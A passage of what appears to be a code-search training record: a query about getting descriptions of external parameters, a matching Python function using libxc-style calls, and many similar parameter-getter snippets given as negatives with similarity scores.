b.append(\"chi2_per_dof\")\n return a, b", "def get_ext_param_default_values(self):\n num_param = core.xc_func_info_get_n_ext_params(self.xc_func_info)\n\n ret = []\n for p in range(num_param):\n tmp = core.xc_func_info_get_ext_params_default_value(self.xc_func_info, p)\n ret.append(tmp)\n\n return ret", "def build_parameters(self) -> List[str]:\n param_bits = []\n for name in self.parameters:\n param_bits.extend(self.build_parameter_by_name(name) or [])\n return param_bits", "def parameters(self):\n return self.pars", "def get_param_names(obj: Union[Type[_BaseTpcpObject], _BaseTpcpObject]) -> List[str]:\n cls = obj if isinstance(obj, type) else type(obj)\n parameters = list(_get_init_defaults(cls).values())\n for p in parameters:\n if p.kind == p.VAR_POSITIONAL:\n raise RuntimeError(\n \"tpcp algorithms and pipelines should always specify their parameters in the signature of their \"\n f\"__init__ (no varargs). {cls} doesn't follow this convention.\"\n )\n # Extract and sort argument names excluding 'self'\n return sorted([p.name for p in parameters])", "def get_param_texts(self):\n return self.param_texts", "def step_extract_parameters(self) -> list:\n result = []\n if self.has_step_field(\"task.parameters\"):\n for param in self.step_field(\"task.parameters\"):\n for key in param:\n result += [\"-p\", key, param[key]]\n return result", "def return_parameter_names():\n return list(titles), list(labels)", "def named_trainable_parameters(self) -> List[str]:\n return [name for name, p in self._model.named_parameters() if p.requires_grad]", "def potential_parameters(cls):\n return [\"k\", \"length\"]", "def print_param_names(model):\n for (param_name, param) in model.get_parameters().items():\n print(param_name, param.shape)", "def sensor_parameters_list(self):\n return list(self.params_f.keys()) + list(self.params_i.keys())", "def get_aux_parameters(self, name):\n param = {}\n if self.aux_windows.has_key(name):\n for key in dir(self.aux_windows[name]):\n if key.startswith('__'): continue\n value = getattr(self.aux_windows[name], key)\n if callable(value): continue\n param[key] = value\n\n return param\n return None", "def parameter_names_from_model(model):\n variables = model.getVariables()\n itvar = variables.iterator()\n names = []\n for i in xrange(len(variables)):\n currentvar = itvar.Next()\n names.append(currentvar.GetName())\n return names", "def params(self):\n return self._pars", "def extract_parameters(self) -> Dict[str, Set[str]]:\n regex = \"\\{([A-Za-z0-9_]+)\\}\"\n reserved_parameters = [\n \"output\",\n \"input\",\n \"output_vec\",\n \"input_vec\",\n \"df\",\n \"vec_open\",\n \"vec_close\",\n ]\n parameters = {}\n for scope in self.scopes:\n parameters[scope] = set(\n [\n x\n for x in re.findall(regex, self.call)\n if x not in reserved_parameters\n ]\n )\n return parameters", "def potential_parameters(cls):\n return [\"k\", \"angle\"]", "def getListOfParameters(self):\n return self.model.getListOfParameters()", "def parameters(self):\n return self._params", "def layerParamKeys(self):\n return self._layerParamKeys", "def parameters(self):\n params = []\n for layer in (self.conv1, self.conv2, self.conv3, self.conv4, self.dense1, self.dense2):\n params += list(layer.parameters)\n return params", "def source_parameter_names(self):\n return [x for x, y in self.transformations.items() if isinstance(y, str)]", "def parameters(self):\n pass", "def param(self):\r\n paramlist = []\r\n gradlist = []\r\n\r\n for layer in self.layers:\r\n try:\r\n layer_param, layer_grad = layer.param()\r\n paramlist = paramlist + layer_param\r\n gradlist = gradlist + layer_grad\r\n except ValueError:\r\n continue\r\n return paramlist, gradlist", "def get_parameters(**kwargs):\r\n parameters = vars(global_file.params)\r\n for key, value in kwargs.items():\r\n parameters[str(key)] = value\r\n return parameters", "def parameters(self):\n return [i.parameter for i in self.joints.values()]", "def getListOfParameters(self, *args):\n return _libsbml.KineticLaw_getListOfParameters(self, *args)", "def _get_parameters(self):\n return (self.SYMBOL, self.parameterArray())", "def get_parameters(self):\n return self.parameters", "def get_parameters(self):\n return self.parameters", "def get_parameters(self):\n return self.parameters", "def get_parameters(self):\n return self.parameters", "def get_parameters(self):\n return self.parameters", "def get_original_names_and_sharded_parameters(self):\n orig_named_parameters = []\n for module_name, m in self.named_modules(): # includes self\n if isinstance(m, XlaFullyShardedDataParallel):\n prefix = \"\" if module_name == \"\" else module_name + \".\"\n for p in self.sharded_params:\n n = prefix + p._orig_name\n n = n.replace(\"_fsdp_wrapped_module.\", \"\").replace(\"_fpw_module.\", \"\")\n orig_named_parameters.append((n, p))\n\n return orig_named_parameters", "def get_params_iter(self):\n return []", "def get_parameter_names(self, exclude_pop_model=False):\n if (self._population_model is None) or exclude_pop_model:\n names = self._mechanistic_model.parameters()\n for error_model in self._error_models:\n names += error_model.get_parameter_names()\n return names\n\n return self._population_model.get_parameter_names()", "def params(self):\n return [p for sublist in [o.params for o in self.obs] for p in sublist]", "def get_params(self):\n raise NotImplementedError", "def parameters(self):\n #print \"in instrument.parameter()\"\n return self._params", "def _create_parameter_names(self):\n self._parameter_names = self.parameter_schema[\"problem\"][\"names\"]", "def get_resource_params(self):\n return SBE37Parameter.list()" ]
[ "0.77504754", "0.7389947", "0.72158164", "0.71607", "0.71043503", "0.7083737", "0.7037365", "0.70315456", "0.7013595", "0.70036983", "0.698914", "0.687916", "0.6841593", "0.6833137", "0.68269855", "0.6797805", "0.6785064", "0.6723883", "0.6707179", "0.6698673", "0.6685417", "0.6665723", "0.66453034", "0.66269267", "0.6609356", "0.6596573", "0.658621", "0.65673566", "0.6565315", "0.65632", "0.65403926", "0.6519185", "0.6518851", "0.65031683", "0.6503134", "0.6495234", "0.6490103", "0.64885306", "0.64810586", "0.64810586", "0.6476288", "0.64712083", "0.64706576", "0.64566225", "0.64416826", "0.6435733", "0.6412809", "0.6401734", "0.6401713", "0.6396525", "0.6381162", "0.6379899", "0.63479406", "0.63391936", "0.63391936", "0.63377947", "0.63377947", "0.63085854", "0.6307663", "0.62927324", "0.62889624", "0.6277699", "0.627462", "0.6267084", "0.62537014", "0.62488204", "0.6241338", "0.62366796", "0.62337875", "0.6224051", "0.6204884", "0.6203125", "0.6194832", "0.6192677", "0.61702985", "0.6168539", "0.61647254", "0.61627674", "0.61624384", "0.61574763", "0.6134144", "0.613352", "0.6129292", "0.6115694", "0.61138", "0.6112525", "0.61120963", "0.611078", "0.611078", "0.611078", "0.611078", "0.611078", "0.61087155", "0.61072356", "0.6091907", "0.6091387", "0.60906893", "0.6089468", "0.60881823", "0.6067726" ]
0.7800671
0
Gets the descriptions of all external parameters
def get_ext_param_descriptions(self): num_param = core.xc_func_info_get_n_ext_params(self.xc_func_info) ret = [] for p in range(num_param): tmp = core.xc_func_info_get_ext_params_description(self.xc_func_info, p) ret.append(tmp.decode("UTF-8")) return ret
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _external_params():\n list_ext_params = []\n list_ext_params.append(\n (hoomd.md.external.field.Periodic, \"params\",\n list([dict(A=1.5, i=1, w=3.5, p=5),\n dict(A=10, i=0, w=3.4, p=2)]), _evaluate_periodic))\n list_ext_params.append(\n (hoomd.md.external.field.Electric, \"E\", list([\n (1, 0, 0),\n (0, 2, 0),\n ]), _evaluate_electric))\n return list_ext_params", "def getParameters(self): #$NON-NLS-1$\r", "def parameters(self):\n return []", "def print_all_params(self, disp=True):\n descriptions = {'general': {}}\n for name, param in self.params.items():\n descriptions['general'][name] = param.get_description()\n\n for comp, comp_obj in self.components.items():\n descriptions[comp] = {}\n for name in comp_obj.get_params():\n descriptions[comp][name] = comp_obj.get_param_description(name)\n return self._print_params(descriptions, disp)", "def get_resource_params():\n return Parameter.list()", "def print_params():\n\n help_out = convert_phil_to_text(master_phil, att_level=1)\n txt_out = convert_phil_to_text(master_phil)\n\n return help_out, txt_out", "def get_parameters_list(self):\n return self.description[\"config\"][\"values\"].keys()", "def paramDetails(cls):\n return {\n 'dim': (10, 20, 2, 20),\n 'nIter': (1, 10, 2, 5),\n 'lamb': (.1, 1., .1, .05),\n 'alph': (30, 50, 5, 40)\n }", "def display_parameters(self):\n\n self.logging.debug(\"============\")\n for attr in self.parm_list:\n self.logging.debug(attr.label + \" (\" + attr.when + \")\" + \" = \" + str(attr.value))\n self.logging.debug(\"============\")", "def get_ext_param_names(self):\n num_param = core.xc_func_info_get_n_ext_params(self.xc_func_info)\n\n ret = []\n for p in range(num_param):\n tmp = core.xc_func_info_get_ext_params_name(self.xc_func_info, p)\n ret.append(tmp.decode(\"UTF-8\"))\n\n return ret", "def get_parameter_descriptions(parameters):\n\n lines = []\n opt_lines = []\n for param in parameters:\n param_name = check_param(flatten_param(param['name']))\n if param['required']:\n required = 'required'\n lines.append(':param {0}: ({1}) {2}'.format(param_name, required,\n param['description']))\n lines.append(':type {0}: {1}'.format(param_name, param['type']))\n else:\n required = 'optional'\n opt_lines.append(':param {0}: ({1}) {2}'.format(param_name,\n required, param['description']))\n opt_lines.append(':type {0}: {1} or None'.format(param_name,\n param['type']))\n\n return lines + opt_lines", "def help(cls):\n print(cls._LIST_PARAMETERS)", "def print_params(self):\n s = self._list_params()+\"\\n\"\n if 'scale_params' in self.__dict__.keys():\n s += self.scale_params._list_params()+\"\\n\"\n if 'atmospheric_params' in self.__dict__.keys():\n if self.atmospheric_params is not None:\n s += self.atmospheric_params._list_params()+\"\\n\"\n\n if 'atemperature_params' in self.__dict__.keys():\n if self.atemperature_params is not None:\n s += self.atemperature_params._list_params()+\"\\n\"\n\n if 'oceanic_params' in self.__dict__.keys():\n if self.oceanic_params is not None:\n s += self.oceanic_params._list_params()+\"\\n\"\n\n if 'ground_params' in self.__dict__.keys():\n if self.ground_params is not None:\n s += self.ground_params._list_params()+\"\\n\"\n\n if 'gotemperature_params' in self.__dict__.keys():\n if self.gotemperature_params is not None:\n s += self.gotemperature_params._list_params() + \"\\n\"\n\n print(\"Qgs v0.2.8 parameters summary\")\n print(\"=============================\\n\")\n print(s)", "def get_params(self):", "def parameter_names(self) -> List[str]:", "def parameters(self):\n pass", "def get_resource_params(self):\n return Parameter.list()", "def get_resource_params(self):\n return Parameter.list()", "def _get_parameters(self) -> list:\n return self.parameters", "def get_param_texts(self):\n return self.param_texts", "def gather_experiment_parameters(self):\n consts = win32com.client.constants.__dicts__[0]\n exp_params = [r for r in consts.keys() if len(r.split(\"EXP_\")) > 1]\n dm_params = [r for r in consts.keys() if len(r.split(\"DM_\")) > 1]\n self.app_param = {} \n self.appdoc_param = {} \n for p in exp_params:\n self.app_param.update({p:self.app.GetParam(consts[p])})\n\n for p in dm_params:\n #self.appdoc_param.update({p:self.app.GetParam(consts[p])}) bug? call appdoc? CP\n\n self.appdoc_param.update({p:self.app.GetParam(consts[p])})", "def get_params(self):\n pass", "def params_desc(self):\n return \"{}/{}/{}/{}\".format(\n self.learning_rate, self.movement, self.milestones, self.gamma\n )", "def get_params_list():\n return common.QOL_PARAMS", "def display_parameters(self):\n l = []\n for param in self.parameters.all():\n if len(param.value) > 16:\n l.append(u\"{}={}...\".format(param.name, param.value[:16]))\n else:\n l.append(u\"{}={}\".format(param.name, param.value))\n return \"; \".join(l)", "def print_params(self):\n print(self._list_params())", "def parameters(self):\n return [term.parameter for term in self.terms]", "def parameters(self):", "def get_params(self):\n return []", "def param_strs(self):\n name_len = max(len(p.name) for p in self)\n value_len = max(len(p.value_str) for p in self.params.values())\n units_len = max(len(p.units) for p in self.params.values())\n return [(p.name.ljust(name_len), p.value_str.ljust(value_len),\n p.units.ljust(units_len), p.__doc__)\n for p in self.params.values() if p]", "def parameters(self):\n return self.pars", "def param(self):\r\n\r\n return []", "def parameters(self):\n return self._params", "def param(self):\n return []", "def param(self):\n return []", "def print_params(env) -> None:\n dict_pretty_print(env.config['parameters'])", "def show_parameters(self):\n with np.printoptions(precision=3, suppress=True):\n print('number of wind phase = {}'.format(self.ncomp))\n print('galactic parameter = {}'.format(self.scaling_field))\n print('reference height = {}'.format(self.z0))\n for p in ['cool_params','hot_params','params','ref_params','scaling_params']:\n params = getattr(self,p)\n print(p)\n for k,v in params.items():\n print(' {} = {}'.format(k,v))", "def get_all_component_parameters(self) -> Dict[str, Any]:\n return self._node[\"app_data\"][\"component_parameters\"]", "def param(self):\r\n return []", "def GetParameters(cls):\n return [\n ParameterDefinition('csvList', 'IN', description='list of all csv trace files'),\n ParameterDefinition('logoPath', 'IN', description='path to the logo image file to be included as watermark (optional)'),\n ]", "def get_diameters():\n return Global_Module.global_diameters", "def parameters(self):\n #print \"in instrument.parameter()\"\n return self._params", "def desc(self) -> List[str]:\n format_data: dict = {\n key: val\n for key, val in self.__dict__.items()\n if (\n not key.startswith(\"_\") and key != \"desc\" and not callable(val)\n )\n }\n format_data.update(self._kwargs)\n ret: List[str] = []\n for descr in self._desc:\n try:\n descr = descr % format_data\n except Exception as kerr:\n raise PyParamException(\n f\"Description of {self.namestr()!r} is formatting \"\n \"using kwargs from contructor. \\n\"\n f\"- desc: {descr}\\n\"\n f\"- key : {{... {str(kerr)[1:-1]} ...}}\"\n ) from None\n else:\n ret.append(descr)\n return ret", "def parameters(self):\n return [p for _, a in vars(self).items() for p in self._params(a)]", "def printConf(self):\n print \"\"\n for pname, pvalue in self.neededParams.items():\n print pname, pvalue\n for pname, pvalue in self.optionalParams.items():\n print pname, pvalue", "def params(self) -> dict:\n\n if not self.exp_metadata.parameters:\n self.exp_metadata.parameters = {}\n return self.exp_metadata.parameters", "def get_params(self):\n raise NotImplementedError", "def get_required_parameters(self) -> list:\n results = []\n if self.no_params or self.params_optional:\n return []\n else:\n for parameter, parameter_details in self.parameters.items():\n # Fixing issue #92\n # if parameter == \"effect\":\n # continue\n if not parameter_details.default_value:\n results.append(parameter_details.name)\n return results", "def summary_parameters(self):\n text = re.sub(r'\\r?\\n', ' - ', self.opt.text[:200])\n return {'adding': text}", "def summary_parameters(self):\n return {'filters': ', '.join(self.getOption('filters'))}", "def get_parameters_with_expert_knowledge(self) -> List[str]:\n return sorted(list(set([p for p, _ in self.expert_knowledge])))", "def getListOfParameters(self):\n return self.model.getListOfParameters()", "def param_description(hf, var):\n val = hf['/input/params/%s' % var].value\n if type(val) != str:\n val = val.decode('UTF-8')\n val = unpickle(val)\n desc = val.description\n\n if desc:\n return desc\n return var", "def parameters(self) -> Dict[str, Any]:\n return self.trainer_parameters", "def parameters(self) -> Dict[str, str]:\n return self._parameters", "def parameters(self):\n return self._params", "def params():\n raise NotImplementedError", "def create_parameters_description():\n description = OrderedDict()\n description['GeneralArguments'] = [\n {\n 'main_argument_name': '--config-file',\n 'argument_name_options': ['--config'],\n 'parameter_name': 'config_file',\n 'help': \"\"\"A json-encoded configuration file, in which one can specify the parameters\n for all detectors in use as well as some general parameters for the whole run.\n The encoded object should therefore be a dictionary,\n with possible top-level keys 'GeneralArguments' (general parameters, not relevant\n to a detector class), 'SaccadeDetector', 'BlinkDetector', 'FixationDetector'\n and 'SmoothPursuitDetector'.\n\n The value for each of the present keys should in turn be a dictionary with keys\n identical to the longest argument names below, without the eye movement name prefix.\n An example (and equivalent to default parameters) configuration file is provided\n in default_parameters.conf.json and includes all possible keys.\n\n In your custom configuration file you do not have to specify any the parameter values,\n missing keys will be considered to have the default value.\n\n For default values, you can consult the respective classes' __init__ methods in\n saccade_detector.py, blink_detector.py, fixation_detector.py and sp_detector.py.\n\n\n Values given through the console interface override the ones in the config file.\"\"\",\n 'kwargs': {}\n },\n {\n 'main_argument_name': '--input-folder',\n 'argument_name_options': ['--in'],\n 'parameter_name': 'input_folder',\n 'help': 'From where to load the gaze points data. If absent, must be present in --config-file file. '\n 'This folder is assumed to have subfolders that correspond to videos, for which recordings '\n 'were made. Each such subdirectory should contain gaze files (one file per observer).',\n 'kwargs': {}\n },\n {\n 'main_argument_name': '--gaze-file-pattern',\n 'argument_name_options': ['--pattern'],\n 'parameter_name': 'gaze_file_pattern',\n 'help': 'Will look for such files in all subdirectories of --input-folder. '\n 'For GazeCom, \\'*.arff\\' is a recommended value (or \\'*.coord\\', if dealing with original dataset files). '\n 'One can use this parameter to match some name pattern as well (not just the file extension), '\n 'for example with \\'*_needed_files_*.arff\\'. \\n'\n 'If no wildcard symbol is found in the provided string, it is assumed to be just the file name '\n 'suffix, so it will be prepended with a wildcard symbol (i.e. \".coord\" will become \"*.coord\").',\n 'kwargs': {}\n },\n {\n 'main_argument_name': '--input-data-type',\n 'argument_name_options': ['--type'],\n 'parameter_name': 'input_data_type',\n 'help': 'Type of data loader to use (if not specified, will try to detect automatically)',\n 'kwargs': {'choices': ['DSF', 'ARFF', 'labelled ARFF']}\n },\n {\n 'main_argument_name': '--verbose',\n 'argument_name_options': ['-v'],\n 'parameter_name': 'verbose',\n 'default': None,\n 'help': 'Whether to output some information about the progress of the run to STDERR',\n 'kwargs': {'action': 'store_const', 'const': True} # only like this can support the default of None\n # (not to override the config all the time\n # with a missing value)\n },\n {\n 'main_argument_name': '--movies',\n 'argument_name_options': ['-m'],\n 'parameter_name': 'movies',\n 'help': 'Which movies out of the input folder to use (might be useful for train/test split). '\n 'The gaze data is supposed to be put under respective directories in the input folder. '\n 'If none are given, all available ones are used.',\n 'kwargs': {'nargs': '+', 'default': None}\n },\n {\n 'main_argument_name': '--output-folder',\n 'argument_name_options': ['--out'],\n 'parameter_name': 'output_folder',\n 'help': 'Where to output the resulting labelled data (if empty, will create a new temporary directory)',\n 'kwargs': {}\n },\n ]\n\n description['SaccadeDetector'] = [\n {\n 'main_argument_name': '--tolerance',\n 'argument_name_options': ['--tol'],\n 'parameter_name': 'tolerance',\n 'help': 'The relative size of the area outside the screen that is still considered to be legal',\n 'kwargs': {'type': float}\n },\n {\n 'main_argument_name': '--threshold-onset-fast-degree-per-sec',\n 'argument_name_options': ['--threshold-onset-fast'],\n 'parameter_name': 'threshold_onset_fast_degree_per_sec',\n 'help': 'Threshold for initialization of saccade detection, in degrees per second',\n 'kwargs': {'type': float}\n },\n {\n 'main_argument_name': '--threshold-onset-slow-degree-per-sec',\n 'argument_name_options': ['--threshold-onset-slow'],\n 'parameter_name': 'threshold_onset_slow_degree_per_sec',\n 'help': 'A slower threshold for saccade onset detection, in degrees per second',\n 'kwargs': {'type': float}\n },\n {\n 'main_argument_name': '--threshold-offset-degree-per-sec',\n 'argument_name_options': ['--threshold-offset'],\n 'parameter_name': 'threshold_offset_degree_per_sec',\n 'help': 'Threshold for saccade offset detection, in degrees per second',\n 'kwargs': {'type': float}\n },\n {\n 'main_argument_name': '--max-speed-degree-per-sec',\n 'argument_name_options': ['--max-speed'],\n 'parameter_name': 'max_speed_degree_per_sec',\n 'help': 'Maximum speed of saccadic eye movements',\n 'kwargs': {'type': float}\n },\n {\n 'main_argument_name': '--min-duration-microsec',\n 'argument_name_options': ['--min-duration'],\n 'parameter_name': 'min_duration_microsec',\n 'help': 'Minimal saccade duration threshold',\n 'kwargs': {'type': float}\n },\n {\n 'main_argument_name': '--max-duration-microsec',\n 'argument_name_options': ['--max-duration'],\n 'parameter_name': 'max_duration_microsec',\n 'help': 'Maximal saccade duration threshold',\n 'kwargs': {'type': float}\n },\n {\n 'main_argument_name': '--velocity-integral-interval-microsec',\n 'argument_name_options': ['--velocity-integral-interval'],\n 'parameter_name': 'velocity_integral_interval_microsec',\n 'help': 'Interval duration, over which to integrate velocity computation.',\n 'kwargs': {'type': float}\n },\n ]\n\n description['BlinkDetector'] = [\n {\n 'main_argument_name': '--max-distance-to-saccade-microsec',\n 'argument_name_options': ['--max-distance-to-saccade'],\n 'parameter_name': 'max_distance_to_saccade_microsec',\n 'help': 'Threshold for distance from a definite blink to a nearby saccade, which will be marked as blink '\n 'as well.',\n 'kwargs': {'type': float}\n },\n ]\n\n description['FixationDetector'] = [\n {\n 'main_argument_name': '--prefiltering-interval-spread-threshold-degrees',\n 'argument_name_options': ['--prefiltering-interval-spread-threshold'],\n 'parameter_name': 'prefiltering_interval_spread_threshold_degrees',\n 'help': 'All the intersaccadic intervals shorter than this will be deemed fixations',\n 'kwargs': {'type': float}\n },\n {\n 'main_argument_name': '--min-sp-duration-microsec',\n 'argument_name_options': ['--min-sp-duration'],\n 'parameter_name': 'min_sp_duration_microsec',\n 'help': 'Minimal duration of a potential SP candidate (fast-moving samples shorter than this threshold '\n 'are labelled as noise)',\n 'kwargs': {'type': float}\n },\n {\n 'main_argument_name': '--sliding-window-width-microsec',\n 'argument_name_options': ['--sliding-window-width'],\n 'parameter_name': 'sliding_window_width_microsec',\n 'help': 'Sliding window for coordinates smoothing',\n 'kwargs': {'type': float}\n },\n {\n 'main_argument_name': '--normalization-sliding-window-size-samples',\n 'argument_name_options': ['--normalization-sliding-window'],\n 'parameter_name': 'normalization_sliding_window_size_samples',\n 'help': 'A moving average sliding window size (to normalize the data)',\n 'kwargs': {'type': int}\n },\n {\n 'main_argument_name': '--speed-threshold-degrees-per-sec',\n 'argument_name_options': ['--speed-threshold'],\n 'parameter_name': 'speed_threshold_degrees_per_sec',\n 'help': 'Biggest plausible speed for a noisy fixation',\n 'kwargs': {'type': float}\n },\n {\n 'main_argument_name': '--sliding-window-criterion',\n 'argument_name_options': ['--sliding-window'],\n 'parameter_name': 'sliding_window_criterion',\n 'help': 'Defines the way we check the samples with the sliding_window_criterion threshold: '\n 'either compute the average speed in the current window, or get the spread of '\n 'the gaze points (i.e. biggest XY bounding box side), divided by the duration',\n 'kwargs': {'choices': ['speed', 'spread']}\n },\n {\n 'main_argument_name': '--intersaccadic-interval-duration-threshold-microsec',\n 'argument_name_options': ['--intersaccadic-interval-duration-threshold'],\n 'parameter_name': 'intersaccadic_interval_duration_threshold_microsec',\n 'help': 'Minimal size of the intersaccadic interval to apply the step with the moving average analysis',\n 'kwargs': {'type': float}\n },\n ]\n\n description['SmoothPursuitDetector'] = [\n # a mutually exclusive group\n [\n {\n 'main_argument_name': '--min-pts',\n 'argument_name_options': [],\n 'parameter_name': 'min_pts',\n 'soft_type': int,\n 'help': 'An integer indicating the minimum number of points required to form a core point\\'s '\n 'neighbourhood, or a string \\'num_observers\\' (meaning that the actual number of observers '\n 'for each movie will be substituted, depending on the data set provided).\\n'\n 'This option is mutually exclusive with --min-observers.',\n 'kwargs': {}\n },\n {\n 'main_argument_name': '--min-observers',\n 'argument_name_options': [],\n 'parameter_name': 'min_observers',\n # first try casting to int, then to float (since int cast will fail for a float)\n 'soft_type': [int, float],\n 'help': 'Either a floating point in [0.0; 1.0] range (indicating the share of all the present '\n 'observers per movie) or int [2; +\\inf) (indicating the absolute threshold for '\n 'observer count in the core point\\'s neighbourhood).\\n'\n 'This option is mutually exclusive with --min-pts.',\n 'kwargs': {}\n }\n ],\n {\n 'main_argument_name': '--eps-deg',\n 'argument_name_options': ['--eps'],\n 'parameter_name': 'eps_deg',\n 'help': 'Spatial Euclidean distance threshold that defines the neighbourhood in the XY-plane',\n 'kwargs': {'type': float}\n },\n {\n 'main_argument_name': '--time-slice-microsec',\n 'argument_name_options': ['--time-slice'],\n 'parameter_name': 'time_slice_microsec',\n 'help': 'Width of the time slice that defines the size of the neighbourhood on the time axis.',\n 'kwargs': {'type': float}\n },\n ]\n\n return description", "def describe_parameters(params):\n param_date = {}\n try:\n for param_filter in params:\n paginator = SSM.get_paginator('describe_parameters')\n params = paginator.paginate(\n ParameterFilters=[\n {\n 'Key': 'Name',\n 'Option': 'Contains',\n 'Values': [\n param_filter\n ]\n }\n ],\n )\n for resp_dict in params:\n if resp_dict['Parameters']:\n for param_name in resp_dict['Parameters']:\n param_date[param_name['Name']\n ] = param_name['LastModifiedDate']\n return param_date\n except ClientError as cleerror:\n raise cleerror\n except ParamValidationError as paramerror:\n raise paramerror", "def __prepare_general_parameters_contents(general_params: dict) -> list:\n\n general_parameters_contents = list()\n\n general_parameters_contents.append(\n f' {len(REAXFF_GENERAL_PARAMS)} ! Number of general parameters\\n')\n\n for key, value in general_params.items():\n general_parameters_contents.append(f' {value:.4f} ! {key}\\n')\n\n return general_parameters_contents", "def _get_parameters(self):\n return None", "def get_parameters(self):\r\n raise Exception(\"Not implemented (server-side parameter initialization)\")", "def parameters(self) -> Mapping[str, str]:\n return pulumi.get(self, \"parameters\")", "def get_params(self, deep=...):\n ...", "def get_params(self):\n\n return None", "def get_params(self):\n\n return None", "def get_params(self):\n\n return None", "def potential_parameters(cls):\n return [\"k\", \"periodicity\", \"phase\", \"idivf\"]", "def potential_parameters(cls):\n return [\"k\", \"periodicity\", \"phase\", \"idivf\"]", "def get_resource_params(self):\n return SBE37Parameter.list()", "def get_parameters(self):\n return self.parameters", "def get_parameters(self):\n return self.parameters", "def get_parameters(self):\n return self.parameters", "def get_parameters(self):\n return self.parameters", "def get_parameters(self):\n return self.parameters", "def potential_parameters(cls):\n return [\"k\", \"length\"]", "def step_extract_parameters(self) -> list:\n result = []\n if self.has_step_field(\"task.parameters\"):\n for param in self.step_field(\"task.parameters\"):\n for key in param:\n result += [\"-p\", key, param[key]]\n return result", "def return_all_parameter_names():\n a = list(titles)\n a.append(r\"$\\chi^{2}$ per degree of freedom\")\n b = list(labels)\n b.append(\"chi2_per_dof\")\n return a, b", "def params(self):\n return self._pars", "def parameters(self):\n return self._parameters", "def parameters(self):\n return self._parameters", "def parameters(self):\n return self._parameters", "def parameters(self):\n return self._parameters", "def parameters(self):\n return self._parameters", "def parameters(self):\n return self._parameters", "def parameters(self):\n return self._parameters", "def parameters(self):\n return self._parameters", "def get_optional_parameters(self) -> list:\n results = []\n if self.no_params or self.params_required:\n return []\n else:\n for parameter, parameter_details in self.parameters.items():\n # Fixing issue #92\n # if parameter == \"effect\":\n # continue\n if parameter_details.default_value:\n results.append(parameter_details.name)\n return results", "def get_params(self, params, name_request):\n self.write('')\n for elem in params:\n request_type = elem['type'] if elem.get('type', None) else 'schema'\n name = elem['name']\n if elem.get('required', None):\n name += '(required)'\n schema = elem.get('schema', None)\n name = f':{name_request} {request_type} {name}:'\n if schema:\n definition = schema['$ref'].split('/')[-1]\n self.write(name + f' :ref:`{definition}`', 1)\n self.write('')\n else:\n desc = elem.get('description', '')\n self.write(name)\n self.write(f'{desc}', self.indent_depth + 1)\n self.write('')", "def _get_params(self):\r\n return self.k._get_params()", "def getListOfParameters(self, *args):\n return _libsbml.KineticLaw_getListOfParameters(self, *args)", "def get_ext_param_default_values(self):\n num_param = core.xc_func_info_get_n_ext_params(self.xc_func_info)\n\n ret = []\n for p in range(num_param):\n tmp = core.xc_func_info_get_ext_params_default_value(self.xc_func_info, p)\n ret.append(tmp)\n\n return ret", "def parameter_names(self) -> list:\n parameters = []\n parameters.extend(self.properties.parameter_names)\n return parameters", "def _describe(self) -> Dict[str, Any]:", "def getParameterInfo(self):\n feature_class = arcpy.Parameter(\n name = 'in_features',\n displayName = 'In Features',\n direction = 'Input',\n datatype = 'GPFeatureLayer',\n parameterType = 'Required')\n\n field_mappings = arcpy.Parameter(\n name = 'in_fields',\n displayName = 'In Fields',\n direction = 'Input',\n datatype = 'GPFieldInfo',\n parameterType = 'Required')\n\n field_mappings.parameterDependencies = [feature_class.name]\n\n output_dir = arcpy.Parameter(\n name = 'output_dir',\n displayName = 'Output folder',\n direction = 'Input',\n datatype = 'DEFolder',\n parameterType = 'Required')\n\n output_name = arcpy.Parameter(\n name = 'output_name',\n displayName = 'Output filename',\n direction = 'Input',\n datatype = 'GPString',\n parameterType = 'Required')\n\n convert_4326 = arcpy.Parameter(\n name = 'convert_4326',\n displayName = 'Convert to WGS84?',\n direction = 'Input',\n datatype = 'Boolean',\n parameterType = 'Optional')\n convert_4326.value = 'True'\n\n convert_geojson = arcpy.Parameter(\n name = 'convert_geojson',\n displayName = 'Convert to GeoJSON?',\n direction = 'Input',\n datatype = 'Boolean',\n parameterType = 'Optional')\n convert_geojson.value = 'True'\n\n convert_kmz = arcpy.Parameter(\n name = 'convert_kmz',\n displayName = 'Convert to KMZ?',\n direction = 'Input',\n datatype = 'Boolean',\n parameterType = 'Optional')\n convert_kmz.value = 'True'\n\n convert_csv = arcpy.Parameter(\n name = 'convert_csv',\n displayName = 'Convert to CSV?',\n direction = 'Input',\n datatype = 'Boolean',\n parameterType = 'Optional')\n\n convert_metadata = arcpy.Parameter(\n name = 'convert_metadata',\n displayName = 'Convert metadata to markdown?',\n direction = 'Input',\n datatype = 'Boolean',\n parameterType = 'Optional')\n\n debug = arcpy.Parameter(\n name = 'debug',\n displayName = 'Debug',\n direction = 'Input',\n datatype = 'Boolean',\n parameterType = 'Optional')\n\n return [feature_class, field_mappings, output_dir, output_name,\n convert_4326, convert_geojson, convert_kmz, convert_csv,\n convert_metadata, debug]", "def parameters_names(cls):\n return cls._Parameters._fields", "def displayDataDescr(cls):\n return (\n \"Parameter\",\n \"Auto range\",\n \"Lower\",\n \"Upper\",\n \"Number of bins\",\n \"X-axis scaling\",\n \"Y-axis weighting\"\n )", "def parameterNames(self, p_int): # real signature unknown; restored from __doc__\n return []", "def parameters(self):\n return self.vars", "def print_general_param(self, name=None, disp=True):\n\n if name is None:\n list = {}\n\n for name in self.params:\n list[name] = self.params[name].get_description()\n\n return self._print_params({'general': list}, disp)\n else:\n if name not in self.params:\n raise IndexError('%s is not a valid general parameter ' % name)\n\n return self._print_params({'general': {name: self.params[name].get_description()}}, disp)" ]
